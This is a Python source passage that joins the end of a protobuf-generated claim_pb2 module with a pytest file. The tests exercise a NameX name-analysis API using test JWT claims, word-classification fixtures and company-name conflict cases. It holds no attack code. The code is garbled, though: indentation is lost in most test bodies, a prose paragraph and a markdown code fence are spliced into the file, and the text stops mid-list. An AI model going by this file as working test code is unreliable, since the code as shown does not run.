_FEE.fields_by_name['currency'].enum_type = _FEE_CURRENCY
_FEE_CURRENCY.containing_type = _FEE
_VIDEO.fields_by_name['audio'].message_type = _AUDIO
_SOFTWARE_OS.containing_type = _SOFTWARE
_LANGUAGE.fields_by_name['language'].enum_type = _LANGUAGE_LANGUAGE
_LANGUAGE.fields_by_name['script'].enum_type = _LANGUAGE_SCRIPT
_LANGUAGE.fields_by_name['region'].enum_type = _LOCATION_COUNTRY
_LANGUAGE_LANGUAGE.containing_type = _LANGUAGE
_LANGUAGE_SCRIPT.containing_type = _LANGUAGE
_LOCATION.fields_by_name['country'].enum_type = _LOCATION_COUNTRY
_LOCATION_COUNTRY.containing_type = _LOCATION
DESCRIPTOR.message_types_by_name['Claim'] = _CLAIM
DESCRIPTOR.message_types_by_name['Stream'] = _STREAM
DESCRIPTOR.message_types_by_name['Channel'] = _CHANNEL
DESCRIPTOR.message_types_by_name['ClaimReference'] = _CLAIMREFERENCE
DESCRIPTOR.message_types_by_name['ClaimList'] = _CLAIMLIST
DESCRIPTOR.message_types_by_name['Source'] = _SOURCE
DESCRIPTOR.message_types_by_name['Fee'] = _FEE
DESCRIPTOR.message_types_by_name['Image'] = _IMAGE
DESCRIPTOR.message_types_by_name['Video'] = _VIDEO
DESCRIPTOR.message_types_by_name['Audio'] = _AUDIO
DESCRIPTOR.message_types_by_name['Software'] = _SOFTWARE
DESCRIPTOR.message_types_by_name['Language'] = _LANGUAGE
DESCRIPTOR.message_types_by_name['Location'] = _LOCATION
Claim = _reflection.GeneratedProtocolMessageType('Claim', (_message.Message,), dict(
DESCRIPTOR = _CLAIM,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Claim)
))
_sym_db.RegisterMessage(Claim)
Stream = _reflection.GeneratedProtocolMessageType('Stream', (_message.Message,), dict(
DESCRIPTOR = _STREAM,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Stream)
))
_sym_db.RegisterMessage(Stream)
Channel = _reflection.GeneratedProtocolMessageType('Channel', (_message.Message,), dict(
DESCRIPTOR = _CHANNEL,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Channel)
))
_sym_db.RegisterMessage(Channel)
ClaimReference = _reflection.GeneratedProtocolMessageType('ClaimReference', (_message.Message,), dict(
DESCRIPTOR = _CLAIMREFERENCE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.ClaimReference)
))
_sym_db.RegisterMessage(ClaimReference)
ClaimList = _reflection.GeneratedProtocolMessageType('ClaimList', (_message.Message,), dict(
DESCRIPTOR = _CLAIMLIST,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.ClaimList)
))
_sym_db.RegisterMessage(ClaimList)
Source = _reflection.GeneratedProtocolMessageType('Source', (_message.Message,), dict(
DESCRIPTOR = _SOURCE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Source)
))
_sym_db.RegisterMessage(Source)
Fee = _reflection.GeneratedProtocolMessageType('Fee', (_message.Message,), dict(
DESCRIPTOR = _FEE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Fee)
))
_sym_db.RegisterMessage(Fee)
Image = _reflection.GeneratedProtocolMessageType('Image', (_message.Message,), dict(
DESCRIPTOR = _IMAGE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Image)
))
_sym_db.RegisterMessage(Image)
Video = _reflection.GeneratedProtocolMessageType('Video', (_message.Message,), dict(
DESCRIPTOR = _VIDEO,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Video)
))
_sym_db.RegisterMessage(Video)
Audio = _reflection.GeneratedProtocolMessageType('Audio', (_message.Message,), dict(
DESCRIPTOR = _AUDIO,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Audio)
))
_sym_db.RegisterMessage(Audio)
Software = _reflection.GeneratedProtocolMessageType('Software', (_message.Message,), dict(
DESCRIPTOR = _SOFTWARE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Software)
))
_sym_db.RegisterMessage(Software)
Language = _reflection.GeneratedProtocolMessageType('Language', (_message.Message,), dict(
DESCRIPTOR = _LANGUAGE,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Language)
))
_sym_db.RegisterMessage(Language)
Location = _reflection.GeneratedProtocolMessageType('Location', (_message.Message,), dict(
DESCRIPTOR = _LOCATION,
__module__ = 'claim_pb2'
# @@protoc_insertion_point(class_scope:pb.Location)
))
_sym_db.RegisterMessage(Location)
# @@protoc_insertion_point(module_scope)
# api/tests/python/end_points/auto_analyse/protected_names/test_auto_analyse_invalid_np_bc.py
from datetime import date
import pytest
from urllib.parse import quote_plus
import jsonpickle
from namex.constants import EntityTypes
from namex.models import User
from namex.services.name_request.auto_analyse import AnalysisIssueCodes
# from tests.python import integration_oracle_namesdb
token_header = {
"alg": "RS256",
"typ": "JWT",
"kid": "flask-jwt-oidc-test-client"
}
claims = {
"iss": "https://sso-dev.pathfinder.gov.bc.ca/auth/realms/sbc",
"sub": "43e6a245-0bf7-4ccf-9bd0-e7fb85fd18cc",
"aud": "NameX-Dev",
"exp": 31531718745,
"iat": 1531718745,
"jti": "flask-jwt-oidc-test-support",
"typ": "Bearer",
"username": "test-user",
"realm_access": {
"roles": [
"{}".format(User.EDITOR),
"{}".format(User.APPROVER),
"viewer",
"user"
]
}
}
API_BASE_URI = '/api/v1/'
ENDPOINT_PATH = API_BASE_URI + 'name-analysis'
# params = {
#     name,
#     location, one of: ['bc', 'ca', 'us', or 'it'],
#     entity_type: abbreviation. convention not finalized yet.
#     request_action, one of: ['new', 'existing', 'continuation']
# }
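Each test below assembles these parameters into a URL query string inline. The same logic can be sketched as a small standalone helper (the `build_query` name is illustrative, not part of the test module):

```python
from urllib.parse import quote_plus


def build_query(params):
    # URL-encode each value (spaces become '+') and join the pairs with '&',
    # mirroring how the tests below assemble their request paths.
    return '&'.join('{!s}={}'.format(k, quote_plus(v)) for k, v in params.items())


print(build_query({'name': 'ABC PLUMBING INC.', 'location': 'BC',
                   'entity_type': 'CR', 'request_action': 'NEW'}))
# -> name=ABC+PLUMBING+INC.&location=BC&entity_type=CR&request_action=NEW
```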
@pytest.mark.skip
def assert_issues_count_is(count, issues):
    if len(issues) > count:
        print('\n' + 'Issue types:' + '\n')
        for issue in issues:
            print('- ' + issue.issueType.value + '\n')
    assert len(issues) == count
@pytest.mark.skip
def assert_issues_count_is_gt(count, issues):
    print('\n' + 'Issue types:' + '\n')
    for issue in issues:
        print('- ' + issue.get('issue_type') + '\n')
    assert len(issues) > count
@pytest.mark.skip
def assert_issue_type_is_one_of(types, issue):
assert issue.get('issue_type') in types
@pytest.mark.skip
def assert_has_issue_type(issue_type, issues):
    has_issue = False
    for issue in issues:
        # Stop at the first match; the original ternary let a later
        # non-matching issue overwrite an earlier match.
        if issue.get('issue_type') == issue_type.value:
            has_issue = True
            break
    assert has_issue is True
@pytest.mark.skip
def assert_correct_conflict(issue_type, issues, expected):
    is_correct = False
    for issue in issues:
        # Latch the first matching issue instead of letting later
        # issues reset the flag.
        if issue.get('issue_type') == issue_type.value and " ".join(
                value['name'] for value in issue.get('conflicts')) == expected:
            is_correct = True
            break
    assert is_correct is True
@pytest.mark.skip
def assert_additional_conflict_parameters(issue_type, issues):
    is_correct = False
    for issue in issues:
        # A bare generator expression is always truthy; use all() so every
        # conflict is actually checked for corp_num and consumption_date.
        if issue.get('issue_type') == issue_type.value and all(
                value['corp_num'] and value['consumption_date']
                for value in issue.get('conflicts')):
            is_correct = True
            break
    assert is_correct is True
# IN THIS SECTION TEST VARIOUS ERROR RESPONSES
# Showstoppers
# 1.- Unique word classified as descriptive
@pytest.mark.xfail(raises=ValueError)
def test_add_distinctive_word_base_request_response(client, jwt, app):
words_list_classification = [
{'word': 'CARPENTRY', 'classification': 'DESC'},
{'word': 'HEATING', 'classification': 'DESC'},
{'word': 'ADJUSTERS', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{'name': 'CARPENTRY INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{'name': 'HEATING LIMITED',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{'name': 'ADJUSTERS LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
for issue in payload.get('issues'):
# Make sure only Well Formed name issues are being returned
assert_issue_type_is_one_of([
AnalysisIssueCodes.ADD_DISTINCTIVE_WORD,
AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD,
AnalysisIssueCodes.TOO_MANY_WORDS
], issue)
assert_has_issue_type(AnalysisIssueCodes.ADD_DISTINCTIVE_WORD, payload.get('issues'))
# 2.- Unique word classified as distinctive
@pytest.mark.xfail(raises=ValueError)
def test_add_descriptive_word_base_request_response(client, jwt, app):
words_list_classification = [{'word': 'COSTAS', 'classification': 'DIST'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'COSTAS INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
for issue in payload.get('issues'):
# Make sure only Well Formed name issues are being returned
assert_issue_type_is_one_of([
AnalysisIssueCodes.ADD_DISTINCTIVE_WORD,
AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD,
AnalysisIssueCodes.TOO_MANY_WORDS
], issue)
assert_has_issue_type(AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD, payload.get('issues'))
# 3.- Unique word not classified in word_classification
@pytest.mark.xfail(raises=ValueError)
def test_add_descriptive_word_not_classified_request_response(client, jwt, app):
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'UNCLASSIFIED INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
for issue in payload.get('issues'):
# Make sure only Well Formed name issues are being returned
assert_issue_type_is_one_of([
AnalysisIssueCodes.ADD_DISTINCTIVE_WORD,
AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD,
AnalysisIssueCodes.TOO_MANY_WORDS
], issue)
assert_has_issue_type(AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD, payload.get('issues'))
# 4.- Unique word classified as distinctive and descriptive
@pytest.mark.xfail(raises=ValueError)
def test_add_descriptive_word_both_classifications_request_response(client, jwt, app):
words_list_classification = [{'word': 'ABBOTSFORD', 'classification': 'DIST'},
{'word': 'ABBOTSFORD', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ABBOTSFORD INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
for issue in payload.get('issues'):
# Make sure only Well Formed name issues are being returned
assert_issue_type_is_one_of([
AnalysisIssueCodes.ADD_DISTINCTIVE_WORD,
AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD,
AnalysisIssueCodes.TOO_MANY_WORDS
], issue)
assert_has_issue_type(AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD, payload.get('issues'))
# 5.- Successful well formed name:
@pytest.mark.xfail(raises=ValueError)
def test_successful_well_formed_request_response(client, jwt, app):
words_list_classification = [{'word': 'ADEA', 'classification': 'DIST'},
{'word': 'HEATING', 'classification': 'DESC'},
{'word': 'ABC', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ADEA HEATING INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ABC PLUMBING INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload status is Available")
# Assert on the value itself; a non-empty tuple is always truthy.
assert payload.get('status') == 'Available'
@pytest.mark.xfail(raises=ValueError)
def test_contains_one_word_to_avoid_request_response(client, jwt, app):
words_list_classification = [{'word': 'ABC', 'classification': 'DIST'},
{'word': 'INVESTIGATORS', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [{'words': 'ICPO, INTERPOL', 'consent_required': False, 'allow_use': False}]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ABC INTERPOL INVESTIGATORS INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.WORDS_TO_AVOID, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_contains_more_than_one_word_to_avoid_request_response(client, jwt, app):
words_list_classification = [{'word': 'CANADIAN', 'classification': 'DIST'},
{'word': 'CANADIAN', 'classification': 'DESC'},
{'word': 'NATIONAL', 'classification': 'DIST'},
{'word': 'NATIONAL', 'classification': 'DESC'},
{'word': 'INVESTIGATORS', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [{'words': 'ICPO, INTERPOL', 'consent_required': False, 'allow_use': False},
{'words': 'CANADIAN NATIONAL, CN', 'consent_required': False,
'allow_use': False}]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'CANADIAN NATIONAL INTERPOL INVESTIGATORS INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.WORDS_TO_AVOID, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_too_many_words_request_response(client, jwt, app):
words_list_classification = [{'word': 'MOUNTAIN', 'classification': 'DIST'},
{'word': 'MOUNTAIN', 'classification': 'DESC'},
{'word': 'VIEW', 'classification': 'DIST'},
{'word': 'VIEW', 'classification': 'DESC'},
{'word': 'FOOD', 'classification': 'DIST'},
{'word': 'FOOD', 'classification': 'DESC'},
{'word': 'GROWERS', 'classification': 'DIST'},
{'word': 'GROWERS', 'classification': 'DESC'},
{'word': 'CAFE', 'classification': 'DIST'},
{'word': 'CAFE', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'MOUNTAIN VIEW FOOD GROWERS & CAFE LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
for issue in payload.get('issues'):
# Make sure only Well Formed name issues are being returned
assert_issue_type_is_one_of([
AnalysisIssueCodes.ADD_DISTINCTIVE_WORD,
AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD,
AnalysisIssueCodes.TOO_MANY_WORDS
], issue)
assert_has_issue_type(AnalysisIssueCodes.TOO_MANY_WORDS, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_contains_unclassifiable_word_request_response(client, jwt, app):
words_list_classification = [{'word': 'FINANCIAL', 'classification': 'DIST'},
{'word': 'FINANCIAL', 'classification': 'DESC'},
{'word': 'SOLUTIONS', 'classification': 'DIST'},
{'word': 'SOLUTIONS', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'UNCLASSIFIED FINANCIAL SOLUTIONS INCORPORATED',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.CONTAINS_UNCLASSIFIABLE_WORD, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_contains_unclassifiable_words_request_response(client, jwt, app):
words_list_classification = [{'word': 'CONSULTING', 'classification': 'DIST'},
{'word': 'CONSULTING', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'FLERKIN BLUBBLUB CONSULTING INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'FLERKIN BLUBBLUB BAKERY INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.CONTAINS_UNCLASSIFIABLE_WORD, payload.get('issues'))
@pytest.mark.parametrize("name, expected",
[
("ARMSTRONG PLUMBING LTD.", "ARMSTRONG PLUMBING & HEATING LTD."),
("ABC CONSULTING LTD.", "ABC INTERNATIONAL CONSULTING LTD.")
]
)
@pytest.mark.xfail(raises=ValueError)
def test_corporate_name_conflict_request_response(client, jwt, app, name, expected):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'},
{'word': 'ABC', 'classification': 'DIST'},
{'word': 'CONSULTING', 'classification': 'DIST'},
{'word': 'CONSULTING', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
conflict_list_db = ['ARMSTRONG PLUMBING & HEATING LTD.', 'ARMSTRONG COOLING & WAREHOUSE LTD.',
'ABC PEST MANAGEMENT CONSULTING INC.', 'ABC ALWAYS BETTER CONSULTING INC.',
'ABC - AUTISM BEHAVIOUR CONSULTING INCORPORATED', 'ABC INTERNATIONAL CONSULTING LTD.']
save_words_list_name(conflict_list_db)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': name,
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
payload_lst = payload.get('issues')
assert_issues_count_is_gt(0, payload_lst)
assert_correct_conflict(AnalysisIssueCodes.CORPORATE_CONFLICT, payload_lst, expected)
@pytest.mark.parametrize("name, expected",
[
("NO. 295 CATHEDRAL VENTURES LTD.", "CATHEDRAL HOLDINGS LTD."),
("NO. 295 SCS NO. 003 VENTURES LTD.", "SCS SOLUTIONS INC."),
("2000 ARMSTRONG -- PLUMBING 2020 LTD.", "ARMSTRONG PLUMBING & HEATING LTD."),
("ABC TWO PLUMBING ONE INC.", "ABC PLUMBING & HEATING LTD."),
("SCS HOLDINGS INC.", "SCS SOLUTIONS INC."),
("RE/MAX LUMBY INC.", "REMAX LUMBY"),
("RE MAX LUMBY INC.", "REMAX LUMBY"),
("468040 B.C. LTD.", "468040 BC LTD."),
("S, C & S HOLDINGS INC.", "SCS SOLUTIONS INC."),
("EQTEC ENGINEERING & SOLUTIONS LTD.", "EQTEC ENGINEERING LTD.")
]
)
@pytest.mark.xfail(raises=ValueError)
def test_corporate_name_conflict_strip_out_numbers_request_response(client, jwt, app, name, expected):
words_list_classification = [{'word': 'CATHEDRAL', 'classification': 'DIST'},
{'word': 'VENTURES', 'classification': 'DIST'},
{'word': 'VENTURES', 'classification': 'DESC'},
{'word': 'SCS', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'},
{'word': 'ABC', 'classification': 'DIST'},
{'word': 'HOLDINGS', 'classification': 'DIST'},
{'word': 'HOLDINGS', 'classification': 'DESC'},
{'word': 'BC', 'classification': 'DIST'},
{'word': 'BC', 'classification': 'DESC'},
#{'word': '468040', 'classification': 'DIST'},
{'word': 'EQTEC', 'classification': 'DIST'},
{'word': 'ENGINEERING', 'classification': 'DIST'},
{'word': 'ENGINEERING', 'classification': 'DESC'},
{'word': 'SOLUTIONS', 'classification': 'DIST'},
{'word': 'SOLUTIONS', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
conflict_list_db = ['CATHEDRAL VENTURES TRADING LTD.', 'CATHEDRAL HOLDINGS LTD.',
'SCS ENTERPRISES INTERNATIONAL', 'SCS SOLUTIONS INC.',
'ARMSTRONG PLUMBING & HEATING LTD.', 'ARMSTRONG COOLING & WAREHOUSE LTD.',
'ABC PLUMBING & HEATING LTD.', 'REMAX LUMBY', '468040 BC LTD.',
'EQTEC ENGINEERING LTD.', 'EQTEC SOLUTIONS LTD.']
save_words_list_name(conflict_list_db)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': name,
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
payload_lst = payload.get('issues')
assert_issues_count_is_gt(0, payload_lst)
assert_correct_conflict(AnalysisIssueCodes.CORPORATE_CONFLICT, payload_lst, expected)
assert_additional_conflict_parameters(AnalysisIssueCodes.CORPORATE_CONFLICT, payload_lst)
@pytest.mark.parametrize("name, expected",
[
("ARMSTRONG PLUMBING & HEATING LTD.", "ARMSTRONG PLUMBING & HEATING LTD.")
]
)
@pytest.mark.xfail(raises=ValueError)
def test_corporate_name_conflict_exact_match_request_response(client, jwt, app, name, expected):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'},
{'word': 'HEATING', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
conflict_list_db = ['ARMSTRONG PLUMBING & HEATING LTD.', 'ARMSTRONG COOLING & WAREHOUSE LTD.']
save_words_list_name(conflict_list_db)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': name,
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
payload_lst = payload.get('issues')
assert_issues_count_is_gt(0, payload_lst)
assert_correct_conflict(AnalysisIssueCodes.CORPORATE_CONFLICT, payload_lst, expected)
assert_additional_conflict_parameters(AnalysisIssueCodes.CORPORATE_CONFLICT, payload_lst)
@pytest.mark.xfail(raises=ValueError)
def test_name_requires_consent_compound_word_request_response(client, jwt, app):
words_list_classification = [{'word': 'CANADIAN', 'classification': 'DIST'},
{'word': 'CANADIAN', 'classification': 'DESC'},
{'word': 'SUMMERS', 'classification': 'DIST'},
{'word': 'SUMMERS', 'classification': 'DESC'},
{'word': 'GAMES', 'classification': 'DIST'},
{'word': 'GAMES', 'classification': 'DESC'},
{'word': 'BLAKE', 'classification': 'DIST'},
{'word': 'BLAKE', 'classification': 'DESC'},
{'word': 'ENGINEERING', 'classification': 'DIST'},
{'word': 'ENGINEERING', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': 'SUMMER GAMES, WINTER GAMES',
'consent_required': True, 'allow_use': True
},
{
'words': 'CONSULTING ENGINEER, ENGINEER, ENGINEERING, INGENIERE, INGENIEUR, INGENIEUR CONSIEL, P ENG, PROFESSIONAL ENGINEER',
'consent_required': True, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'CANADIAN SUMMERS GAMES LIMITED',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'BLAKE ENGINEERING LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.NAME_REQUIRES_CONSENT, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_name_requires_consent_more_than_one_word_request_response(client, jwt, app):
words_list_classification = [{'word': 'BLAKE', 'classification': 'DIST'},
{'word': 'BLAKE', 'classification': 'DESC'},
{'word': 'ENGINEERING', 'classification': 'DIST'},
{'word': 'ENGINEERING', 'classification': 'DESC'},
